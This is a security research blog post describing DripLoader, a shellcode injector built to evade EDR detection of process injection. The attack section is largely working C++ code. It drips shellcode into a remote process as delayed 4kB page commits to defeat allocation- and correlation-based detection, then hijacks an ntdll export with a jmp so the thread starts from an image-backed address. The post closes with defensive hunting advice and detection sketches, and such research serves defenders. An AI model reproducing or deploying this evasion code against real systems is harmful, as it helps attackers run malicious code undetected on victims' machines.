Bypassing EDR Real-Time Injection Detection Logic
By Filip Olszak
This post is not about suppressing event collection, but about discovering EDR architecture limitations in the context of process injection.
Some great posts on bypassing EDR agent collection:
Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR (outflank)
A tale of EDR bypass methods (@s3cur3th1ssh1t)
FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking (mdsec)
Hell's Gate (@smelly__vx, @am0nsec)
Halo's Gate - twin sister of Hell's Gate (sektor7)
Another method of bypassing ETW and Process Injection via ETW registration (@modexpblog)
Data Only Attack: Neutralizing EtwTi Provider (@slaeryan, kernel mode)
In the previous post we discussed how solutions that use reliable, kernel-based sources for remote memory allocation events can use them to identify many in-the-wild injections with relative ease, regardless of the specific technique used, and without worrying that the event source is trivial to bypass from user mode. Most notably, Microsoft uses that ETW provider, though there are vendors who do it better.
Today I wanted to share how easy it is to bypass any memory allocation-based logic. We will also bypass thread initialization alerting; combined, the two give us a technique undetectable by MDATP and many other EDRs out there, as of today.
It is important to expose detection gaps like this, not only to force security vendors to improve defenses, but primarily to build awareness around the inherent limitations of these solutions and the need for in-house security R&D programs, or at least the use of well-engineered managed detection services for more complete coverage.
Let's first take a look at what independent evaluations can tell us about process injections, and if there is even anything to bypass.

It's definitely good to know if the product you're using is not able to flag Meterpreter's migrate command and process hollowing procedures from 5+-year-old Carbanak malware available on GitHub, even with prior knowledge of what is going to be tested and half a year to prepare if needed. Other than that, the value of the last evaluation in the context of injections is very limited: we are not getting the full picture of how much each vendor invests in researching TTPs relevant now and in the future, or how robust the detection capabilities and data sources really are.

https://ela.st/mitre-round3
While some EDRs were not able to flag the elementary techniques, many have improved their detection capabilities to the point that today it is not uncommon for red teams to consider process injection OPSEC-expensive. Experienced operators tend to tailor detection bypasses per solution, and in some environments they avoid injecting altogether, as the very limited set of APIs Windows exposes for memory and thread management is under close surveillance.
We are going to talk about bypassing the mature solutions today; for the ones with T1055 misses here, just use APC injection and you'll probably be fine.
Let's first discuss all the detection opportunities for anomalous remote thread creation.
The API getting the most attention has to be kernel32!CreateRemoteThread, but we are really talking about ntdll!NtCreateThreadEx, or the kernel-mode target intercepted through kernel callbacks.
https://github.com/elastic/detection-rules
Here we have a basic detection for a specific Windows process, msbuild.exe, creating a new thread in a remote process. Even though the criticality of a potential true positive would be quite high, after testing, the rule author decided it is only suitable for low severity (probably due to the FP rate), which likely degrades the rule to an IR label/enrichment in most environments.
Such a simple detection rule is unlikely to be part of a mature EDR solution, where customers expect high-severity alerts for activities like this while noise is kept low enough for their analysts to review and classify the important stuff.

https://github.com/FalconForceTeam/FalconFriday
A more generic, custom MDATP thread creation rule based on the new FileProfile() enrichment function: it detects extremely rare files creating threads in remote processes. It is very useful to implement in-house, but still unlikely to be found in EDRs in such a simple form. It would cause substantial numbers of false positives in certain environments and could prove difficult to maintain. As an example, Defender logs most remote thread creations as labeled events, but low file prevalence is not a good enough indicator to trigger an alert, and more advanced logic is in play. The same is true for most decent EDRs.

CRT events logged by Defender
By "detections" and "alerts" I do not just mean labeled activity that can be found somewhere in the platform, but rather independent pieces of logic able to signal threats with high enough fidelity to generate user-facing security incidents with no additional activity tagged on the endpoint.
(I also assume the platform is not incredibly noisy, to the level of it being unusable)
This is important to remember as EDRs use various kinds of correlation to link otherwise undetected activities to existing incidents initiated by high fidelity alerts, or generate them based on some risk score analysis often affectionately called "AI", making it difficult to judge whether some particular TTP would be detected in isolation. Some types of correlation can be very complex and difficult for adversaries to guess, but due to the high costs associated with preserving active context and using it in detection, time-based correlation plays a role in most.
On-agent detections, activity, and software inventories are often not implemented, or are limited in scope, due to reverse engineering concerns or architectural difficulties.
We will exploit this fact later on when building our shellcode injector by introducing delays in execution as one way to avoid detection. The concept is not new and is commonly used in network attacks where IDS solutions tend to detect based on thresholds.
For the same reason, choosing your EDR vendor based on numerical results such as the MITRE evaluation coverage percentage is not a good idea. Among other issues, the test rounds are executed in an unrealistically short time window of around 30 minutes for the whole attack kill chain. Time-based correlation of the host's labeled events into a single alert is therefore good enough to score 100% coverage.
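To make the time-correlation point concrete, here is a minimal C++ sketch of a naive time-window correlator. It is a hypothetical model, not any vendor's logic. Labeled events join a cluster while they fall within windowSec of the cluster's first event, and a cluster only becomes an alert once it holds minEvents events. The LabeledEvent structure and both function names are invented for illustration.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical, simplified labeled event: only the timestamp matters here.
struct LabeledEvent {
    std::uint64_t timestampSec;
};

// Naive time-window correlation: an event joins the current cluster if it
// occurs within windowSec of that cluster's first event, otherwise it starts
// a new cluster. Events are assumed to be sorted by timestamp.
std::vector<std::vector<LabeledEvent>> CorrelateByTime(
    const std::vector<LabeledEvent>& events, std::uint64_t windowSec)
{
    std::vector<std::vector<LabeledEvent>> clusters;
    for (const LabeledEvent& ev : events) {
        if (clusters.empty() ||
            ev.timestampSec - clusters.back().front().timestampSec > windowSec) {
            clusters.push_back(std::vector<LabeledEvent>{ev});
        } else {
            clusters.back().push_back(ev);
        }
    }
    return clusters;
}

// A cluster becomes a user-facing alert only if it reaches minEvents events.
std::size_t CountAlerts(const std::vector<std::vector<LabeledEvent>>& clusters,
                        std::size_t minEvents)
{
    std::size_t alerts = 0;
    for (const auto& cluster : clusters)
        if (cluster.size() >= minEvents) ++alerts;
    return alerts;
}
```

Take a 30-minute window (1800 seconds) and a threshold of three events. Four events spaced ten seconds apart form one cluster and one alert. The same four events spaced an hour apart form four isolated clusters and no alert, which is the weakness that delays in execution exploit.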
So we know that even though the number of functions to monitor is limited, the volume of legitimate events poses significant challenges for high fidelity detection, and forces defenders to narrow down what constitutes "suspicious", resulting in heavy filtering or log&ignore of many collected events.
For thread creation, the most common constraint is thread starting process ≠ hosting process. In other words, only remote thread creation is monitored, usually further limited to threads with:
- a start address in an "unbacked" (not backed by an image file) MEM_COMMIT segment
- a segment size larger than X
At scale this will still generate a very significant number of false positives, which may lead to further filtering, for example:
- thread location (target) only in Windows built-in executables
  - only a subset of these
- thread initiator (source) only in risky executables
  - unknown hashes
  - low file prevalence
  - risky paths (%userprofile%, %temp%, etc.)
  - not seen on the network/on the host
- memory page contains suspicious stuff
Machine learning models are often employed to help solve this issue as well. These assumptions differ between vendors, but the idea is to tame thread creation. In fact, less mature solutions often rely on thread creation hooking/callbacks as their only source of data for injection detection.
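The constraints above can be sketched as a single filter. The following C++ is a hypothetical illustration only. The ThreadCreateEvent fields, the prevalence threshold and the path fragments are assumptions, not the schema or logic of any particular EDR. Note that a thread whose start address is image-backed is dropped before any of the initiator checks run.

```cpp
#include <algorithm>
#include <cassert>
#include <cctype>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Hypothetical, normalized remote thread creation event. Field names are
// illustrative and do not follow any real EDR schema.
struct ThreadCreateEvent {
    std::uint32_t sourcePid;         // process that requested the thread
    std::uint32_t targetPid;         // process that hosts the new thread
    bool startImageBacked;           // start address lies in a MEM_IMAGE region
    std::size_t startRegionSize;     // size of the region holding the start address
    std::string sourcePath;          // image path of the initiating process
    std::uint32_t sourcePrevalence;  // number of hosts that have seen the source file
};

static std::string ToLower(std::string s)
{
    std::transform(s.begin(), s.end(), s.begin(),
                   [](unsigned char c) { return static_cast<char>(std::tolower(c)); });
    return s;
}

// Mirrors the constraints above: remote creation only, an unbacked start
// region larger than X, and a "risky" initiator (risky path or low prevalence).
bool IsSuspiciousRemoteThread(const ThreadCreateEvent& ev,
                              std::size_t minRegionSize,
                              std::uint32_t maxPrevalence,
                              const std::vector<std::string>& riskyPathFragments)
{
    if (ev.sourcePid == ev.targetPid) return false;        // local thread, not monitored
    if (ev.startImageBacked) return false;                 // image-backed start is filtered out
    if (ev.startRegionSize <= minRegionSize) return false; // region not larger than X

    const std::string path = ToLower(ev.sourcePath);
    const bool riskyPath = std::any_of(
        riskyPathFragments.begin(), riskyPathFragments.end(),
        [&path](const std::string& fragment) {
            return path.find(ToLower(fragment)) != std::string::npos;
        });
    return riskyPath || ev.sourcePrevalence <= maxPrevalence;
}
```

Every additional condition cuts false positives, but it also widens the set of events that are collected and then silently ignored.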
While it is true that for the majority of injection techniques a new thread will be created in the target process at some point, how it's created is often unexpected, which makes monitoring infeasible. Relying exclusively on ntdll!NtCreateThread(Ex) hooking/thread creation callbacks is therefore an easily exploitable design flaw nowadays.
SetThreadContext
In the case of process hollowing or thread hijacking, our target thread has already been created legitimately, either by the Windows Loader or locally by the target application, so there is no thread creation to detect. This is one of the reasons Cobalt Strike's execute-assembly uses SetThreadContext instead of CRT injection on the sacrificial process.
Once we have the telemetry, however, certain SetThreadContext anomalies are much easier to detect at scale than CRT injection. Today, in many environments, they generate high-criticality alerts, rendering fork&run useless in stealthy offensive ops.
QueueUserAPC
Asynchronous Procedure Calls provide another avenue for avoiding thread creation. An APC can be queued for an existing thread and is executed once that thread enters an alertable state.
In recent years userland hooking evasion has been getting a lot of coverage, and Early Bird injection has popularized the use of APCs for that purpose. The idea is to queue an APC in a newly spawned, suspended process before the ntdll!LdrpInitializeProcess function has had a chance to run. That way our scheduled routine is executed before the hooking DLLs are loaded into the target process.
DripLoader is an evasive shellcode loader (injector) for bypassing event-based injection detection, without necessarily suppressing event collection. The project aims to highlight the limitations of event-driven injection identification and to show the need for more advanced memory scanning and smarter local agent inventories in EDRs.
DripLoader evades EDRs by:
- using the most risky APIs possible, like NtAllocateVirtualMemory and NtCreateThreadEx
- blending in with call arguments to create events that vendors are forced to drop or log&ignore due to volume
- avoiding multi-event correlation by introducing delays
To bypass any memory allocation-based logic, we will only commit pages of page granularity, i.e. PageSize-sized pages, which on Windows 10 with a modern processor is 4kB:
- this constant, found in the SYSTEM_INFO structure, tells us the smallest possible size of a VM allocation
- since most legitimate remote VM operations work on a single byte or a few bytes, 4kB is by far the most prevalent allocation size (>95%), making it extremely challenging to detect on
- we need our shellcode in memory as a contiguous byte sequence, so we cannot let kernel32!VirtualAllocEx choose the base: it might reserve memory at an address where the other allocations will not fit
- in Windows, any new VM allocation made with kernel32!VirtualAllocEx and similar functions is rounded up to AllocationGranularity, another constant found in SYSTEM_INFO that is usually 64kB
- for example, if we allocate 4kB of MEM_COMMIT | MEM_RESERVE memory at 0x40000000, the whole 64kB region from 0x40000000 to 0x40010000 will be unavailable for new allocations
- pre-define a list of 64-bit base addresses and VirtualQueryEx the target process to find the first region able to fit our shellcode blob
const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
(void*)0x0000000010000000,
(void*)0x0000000021000000,
(void*)0x0000000032000000,
(void*)0x0000000043000000,
(void*)0x0000000050000000,
(void*)0x0000000041000000,
(void*)0x0000000042000000,
(void*)0x0000000040000000,
(void*)0x0000000022000000 };
LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
{
MEMORY_BASIC_INFORMATION mbi;
for (auto base : VC_PREF_BASES) {
VirtualQueryEx(
hProc,
base,
&mbi,
sizeof(MEMORY_BASIC_INFORMATION)
);
if (MEM_FREE == mbi.State) {
uint64_t i;
for (i = 0; i < cVmResv; ++i) {
LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
VirtualQueryEx(
hProc,
currentBase,
&mbi,
sizeof(MEMORY_BASIC_INFORMATION)
);
if (MEM_FREE != mbi.State)
break;
}
if (i == cVmResv) {
// found suitable base
return base;
}
}
}
return nullptr;
}
- reserve the required number of full AllocationGranularity-sized (64kB) regions, then loop over them, committing 4kB pages to ensure page alignment
// MEM_RESERVE, NO_ACCESS, 64kB
for (i = 1; i <= cVmResv; ++i)
{
// sleeps here
ANtAVM(
hProc,
&currentVmBase,
NULL,
&szVmResv,
MEM_RESERVE,
PAGE_NOACCESS
);
if (STATUS_SUCCESS == status)
vcVmResv.push_back(currentVmBase);
else
return 4;
currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
}
// MEM_COMMIT, PAGE_READWRITE -> PAGE_EXECUTE_READ, 4kB
for (i = 0; i < cVmResv; ++i)
{
for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i)
{
DWORD offset = (cmm_i * szVmCmm);
currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);
ANtAVM(
hProc,
&currentVmBase,
NULL,
&szVmCmm,
MEM_COMMIT,
PAGE_READWRITE
);
// sleeps here
SIZE_T szWritten{ 0 };
ANtWVM(
hProc,
currentVmBase,
&shellcode[offsetSc],
szVmCmm,
&szWritten
);
offsetSc += szVmCmm;
// sleeps here
ANtPVM(
hProc,
&currentVmBase,
&szVmCmm,
PAGE_EXECUTE_READ,
&oldProt
);
}
}
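The AllocationGranularity behavior described earlier comes down to simple alignment arithmetic: a 4kB MEM_COMMIT | MEM_RESERVE allocation at 0x40000000 blocks the whole 64kB block. Below is a minimal C++ sketch that assumes the typical 4kB page size and 64kB allocation granularity. On a real system both values would be read from the dwPageSize and dwAllocationGranularity members of SYSTEM_INFO via GetSystemInfo. The helper names are hypothetical.

```cpp
#include <cassert>
#include <cstdint>

// Rounds value down to a multiple of alignment (alignment must be a power of two).
constexpr std::uint64_t AlignDown(std::uint64_t value, std::uint64_t alignment)
{
    return value & ~(alignment - 1);
}

// Rounds value up to a multiple of alignment (alignment must be a power of two).
constexpr std::uint64_t AlignUp(std::uint64_t value, std::uint64_t alignment)
{
    return (value + alignment - 1) & ~(alignment - 1);
}

// Half-open address range [begin, end).
struct AddressRange {
    std::uint64_t begin;
    std::uint64_t end;
};

// Address space no other reservation can use after `size` bytes are allocated
// at `base`: reservations start on allocation-granularity boundaries, so the
// remainder of the last granularity block is unusable for new ones.
constexpr AddressRange ReservationFootprint(std::uint64_t base, std::uint64_t size,
                                            std::uint64_t allocGranularity)
{
    return AddressRange{ AlignDown(base, allocGranularity),
                         AlignUp(base + size, allocGranularity) };
}

// Typical values discussed in the text (assumed; query SYSTEM_INFO in practice).
constexpr std::uint64_t kPageSize = 0x1000;          // 4kB
constexpr std::uint64_t kAllocGranularity = 0x10000; // 64kB

static_assert(ReservationFootprint(0x40000000, kPageSize, kAllocGranularity).end == 0x40010000,
              "a 4kB allocation at 0x40000000 occupies the whole 64kB block");
```

This matches the 0x40000000 example from the list: the 4kB allocation leaves 0x40000000 to 0x40010000 unavailable for new reservations.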
The pages are also written to and individually re-protected in each iteration, so the logged VirtualProtectEx events do not show a large RegionSize for the target memory (TiEtw provides this property, and hooks can too).
Now that we have our shellcode in the remote process, we need to initiate its execution.
To do this, we will use the NtCreateThreadEx native API, which is the ntdll target of CRT and hence very commonly called by legitimate software. To bypass detections, we will:
- create the new thread from a MEM_IMAGE base address
  - moreover, we use a known-good module loaded by the Windows Loader, ntdll.dll
  - the location will be patched with an absolute jmp to our shellcode base at the time of thread creation
Note that our code does not need to keep running in a MEM_IMAGE segment, as we only care about the arguments logged in the TiEtw/hook event. Suppose our shellcode creates a new thread (as happens, for example, when using sRDI beacon.dll). Most EDRs won't tag the locally created thread, but it will no longer have ntdll as its start address. That could get it detected by basic endpoint protection, and it will get it detected by Get-InjectedThread.
- figure out the RVA of the function we will hijack
// ntdll.dll
char jmpModName[]{ 'n','t','d','l','l','.','d','l','l','\0' };
// RtlpWow64CtxFromAmd64
char jmpFuncName[]{ 'R','t','l','p','W','o','w','6','4','C','t','x','F','r','o','m','A','m','d','6','4','\0' };
LPVOID PrepEntry(HANDLE hProc, LPVOID vm_base)
{
unsigned char* b = (unsigned char*)&vm_base;
unsigned char jmpSc[7]{
0xB8, b[0], b[1], b[2], b[3],
0xFF, 0xE0
};
// find the export EP offset
HMODULE hJmpMod = LoadLibraryExA(
jmpModName,
NULL,
DONT_RESOLVE_DLL_REFERENCES
);
if (!hJmpMod)
return nullptr;
LPVOID lpDllExport = GetProcAddress(hJmpMod, jmpFuncName);
DWORD offsetJmpFunc = (DWORD)lpDllExport - (DWORD)hJmpMod;
[...]
}
- find the base of the remote ntdll and calculate the AVA
[...]
LPVOID lpRemFuncEP{ 0 };
HMODULE hMods[1024];
DWORD cbNeeded;
char szModName[MAX_PATH];
if (EnumProcessModules(hProc, hMods, sizeof(hMods), &cbNeeded))
{
int i;
for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++)
{
if (GetModuleFileNameExA(hProc, hMods[i], szModName, sizeof(szModName) / sizeof(char)))
{
if (strcmp(PathFindFileNameA(szModName), jmpModName)==0) {
lpRemFuncEP = hMods[i];
break;
}
}
}
}
lpRemFuncEP = (LPVOID)((DWORD_PTR)lpRemFuncEP + offsetJmpFunc);
[...]
- overwrite the function prologue with a jmp
[...]
if (NULL == lpRemFuncEP)
return nullptr;
SIZE_T szWritten{ 0 };
WriteProcessMemory(
hProc,
lpDllExport,
jmpSc,
sizeof(jmpSc),
&szWritten
);
return lpDllExport;
}
CreateRemoteThread
The full source and more explanations can be found on GitHub
1. The activity will generate events with the following characteristics:
// reservations
VM_ALLOC:
REMOTE: 1,
SIZE: 0x10000,
TYPE: 0x2000,
PROT: 0x01 (-)
// commits
VM_ALLOC:
REMOTE: 1,
SIZE: 0x1000,
TYPE: 0x1000,
PROT: 0x04 (rw)
VM_WRITE:
REMOTE: 1,
SIZE: 0x1000,
THREAD_START:
REMOTE: 1,
SUSPENDED: 0,
ACCMSK: 0xFFFF (full),
PAGE_TYPE: 0x1000000 (img),
LPTHREAD_START_ROUTINE: ntdll.RtlpWow64CtxFromAmd64+0x0
2. State of the target process (assuming the shellcode does not create a thread)
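On the defensive side, the event characteristics listed in item 1 suggest a stateful correlation that does not depend on a short time window. The C++ below is a hypothetical sketch, not a production detection; the TelemetryEvent model and the minContiguousPages threshold are assumptions. It keeps the set of page-sized remote commits per (source, target) pair for the whole stream. It flags a pair when a remote thread start follows a run of contiguous pages, so delays between individual events do not break the sequence. The price is exactly the expense discussed earlier: context has to be preserved per process pair.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <map>
#include <set>
#include <utility>
#include <vector>

// Hypothetical event model loosely following the characteristics in item 1.
enum class EventKind { VmCommit, ThreadStart };

struct TelemetryEvent {
    EventKind kind;
    std::uint32_t sourcePid;
    std::uint32_t targetPid;
    std::uint64_t address;  // committed page base, or thread start address
    std::uint64_t size;     // commit size (unused for ThreadStart)
};

using ProcPair = std::pair<std::uint32_t, std::uint32_t>;

// Flags (source, target) pairs where a remote thread start follows a run of at
// least minContiguousPages adjacent, page-sized remote commits. State is kept
// per pair for the whole stream instead of a short time window.
std::set<ProcPair> FindDripPattern(const std::vector<TelemetryEvent>& events,
                                   std::uint64_t pageSize,
                                   std::size_t minContiguousPages)
{
    std::map<ProcPair, std::set<std::uint64_t>> committedPages;
    std::set<ProcPair> flagged;
    for (const TelemetryEvent& ev : events) {
        if (ev.sourcePid == ev.targetPid) continue;  // skip local activity
        const ProcPair key{ev.sourcePid, ev.targetPid};
        if (ev.kind == EventKind::VmCommit && ev.size == pageSize) {
            committedPages[key].insert(ev.address);
        } else if (ev.kind == EventKind::ThreadStart) {
            // Longest run of adjacent pages (std::set iterates in ascending order).
            std::size_t best = 0, run = 0;
            std::uint64_t prev = 0;
            for (std::uint64_t addr : committedPages[key]) {
                run = (run > 0 && addr == prev + pageSize) ? run + 1 : 1;
                if (run > best) best = run;
                prev = addr;
            }
            if (best >= minContiguousPages) flagged.insert(key);
        }
    }
    return flagged;
}
```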


- Option #1: Monitor injection APIs yourself
- EDRs with custom rule creation (or hunting) capabilities can be used, but make sure to fully understand under what circumstances events are collected
- aggregations and least frequency analysis hunting queries can be used to reduce workloads for your team
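A least frequency analysis over remote thread start locations can be sketched as follows. This is a hypothetical C++ illustration. The input is assumed to be a flat list of start symbols already resolved from thread creation events, in the same format as ntdll.RtlpWow64CtxFromAmd64+0x0 in the listing above, and the threshold is arbitrary.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <map>
#include <string>
#include <utility>
#include <vector>

using SymbolCount = std::pair<std::string, std::size_t>;

// Least frequency analysis: count how often each remote thread start location
// occurs and return those seen at most maxCount times, rarest first (ties keep
// alphabetical order), so analysts review the tail instead of the full volume.
std::vector<SymbolCount> RarestStartSymbols(const std::vector<std::string>& startSymbols,
                                            std::size_t maxCount)
{
    std::map<std::string, std::size_t> counts;
    for (const std::string& sym : startSymbols) ++counts[sym];

    std::vector<SymbolCount> rare;
    for (const auto& kv : counts)
        if (kv.second <= maxCount) rare.push_back(kv);

    std::stable_sort(rare.begin(), rare.end(),
                     [](const SymbolCount& a, const SymbolCount& b) { return a.second < b.second; });
    return rare;
}
```

Rare start locations, such as an ntdll export that no legitimate software uses as a thread entry, rise to the top of the list even when each individual event looks unremarkable.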